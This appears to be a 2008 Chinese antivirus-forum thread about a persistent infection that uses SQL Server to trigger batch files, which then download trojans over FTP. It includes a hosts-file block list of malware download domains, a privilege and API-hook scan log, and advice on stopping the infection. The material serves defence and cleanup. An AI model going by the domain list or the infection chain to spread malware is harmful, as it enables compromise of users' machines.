127.0.0.1 down.malasc.cn
127.0.0.1 llboss.com
127.0.0.1 nx.51ylb.cn
127.0.0.1 my.531jx.cn
127.0.0.1 qqq.dzydhx.com
127.0.0.1 qqq.hao1658.com
127.0.0.1
www.333292.com127.0.0.1 down.18dd.net
127.0.0.1 up.22x44.com
127.0.0.1 aaa.faba01.com
127.0.0.1 bad.tqdlt.cn
127.0.0.1 1.chsipo.com
127.0.0.1 c3.aishangai.net
127.0.0.1 c2.aishangai.net
127.0.0.1 xxx.188dm.com
127.0.0.1 x2.1a2b3c1.com
127.0.0.1 d1.163500.net
127.0.0.1 down.google-serv.cn
127.0.0.1 idc.windowsupdeta.cn
127.0.0.1 nc.mskess.com
127.0.0.1 ok.sl8cjs.cn
127.0.0.1 dl.pvs360.com
127.0.0.1 ta.pvs360.com
127.0.0.1 cw.pvs360.com
127.0.0.1 fg.pvs360.com
==================================
进程特权扫描
特殊特权被允许: SeLoadDriverPrivilege [PID = 1748, C:\PROGRA~1\MICROS~2\MSSQL\BINN\SQLSERVR.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 196, C:\PROGRAM FILES\ASUS SECURITY CENTER\ASUS SECURITY PROTECT MANAGER\BIN\ASGHOST.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 196, C:\PROGRAM FILES\ASUS SECURITY CENTER\ASUS SECURITY PROTECT MANAGER\BIN\ASGHOST.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 3840, C:\PROGRAM FILES\WIRELESS CONSOLE 2\WCOURIER.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 3840, C:\PROGRAM FILES\WIRELESS CONSOLE 2\WCOURIER.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 164, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTMNG.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 164, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTMNG.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 2884, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSA2DP.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2884, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSA2DP.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 2916, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHID.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2916, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHID.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 3160, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHSP.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 3160, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHSP.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 2816, D:\PROGRAM FILES\应用\同花顺核新2008\ZDSJ.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2816, D:\PROGRAM FILES\应用\同花顺核新2008\ZDSJ.EXE]
==================================
API HOOK
入口点错误:CreateProcessA (危险等级: 高, 被下面模块所HOOK: 0x00FF3DA5)
入口点错误:CreateProcessW (危险等级: 高, 被下面模块所HOOK: 0x00FF3E8D)
==================================
隐藏进程
N/A
==================================
[/CODE]
月神の舞者 - 2008-9-2 22:10:00
……头大,杀个毒搞这么麻烦,要不要我去研究一下字节消失硬件,直接删除字节……
SpeW - 2008-9-2 22:18:00
楼主前期用瑞星主防保护一下CMD就不会有这么多事了 哎.............. 现在问题很复杂啊 日志要看的话估计一时半伙还看不完
sihaiweijia - 2008-9-2 23:45:00
先不让cmd运行再删怎么样
在组策略里把cmd禁用
1234567i - 2008-9-3 9:19:00
楼上的上策,不过在组策略中cmd的路径是。。。。
Frank3160449 - 2008-9-3 9:37:00
你就用X-DELBOX删除其病毒并抑制再生。再用组织略。。
1234567i - 2008-9-3 23:12:00
将cmd.exe安全设置为只有administrator用户可以访问,暂时解决问题。cmd进程不再跳出来。
hongjiaen - 2008-9-3 23:57:00
既然是批处理的
你先吧cmd.exe重命名下再去杀干净,杀完重命名回来
1234567i - 2008-9-4 18:01:00
这个病毒的原理应该是这样:
1 通过sqlserver数据库进程启动批处理程序
2 在批处理中生成*.sys和*.bat文件,并在其中写入通过ftp下载病毒文件的代码。
3 运行生成的批处理文件通过ftp下载病毒
4下载完成后运行该病毒,并删除下载批处理程序。消灭病毒来源的痕迹。
也就是说上面说道的*.sys 和 *.bat都不是病毒,是用来下载病毒用的。
真正的病毒是 boots1.exe和bootss.exe等等这些东东。
从我的机器搜索来看,这些病毒并没有成功的下载到我的计算机上。大约是因为我禁用了ftp的关系。
这个病毒的可恶之处就在于,不杀灭sqlserver程序中的病毒代码。那么他就会不断的从不同的ftp上下载各种版本的病毒木马。让你的计算机处于危险的边缘。
1234567i - 2008-9-4 18:02:00
而且你永远不会知道,这些病毒是怎么来的。杀了一个又来一个。
onlysword - 2008-9-23 22:11:00
瑞星就不能出个解决这个问题的俱体办法吗,我是深受害者.怎么也杀不掉,瑞星杀毒难到不好使?
1
© 2000 - 2026 Rising Corp. Ltd.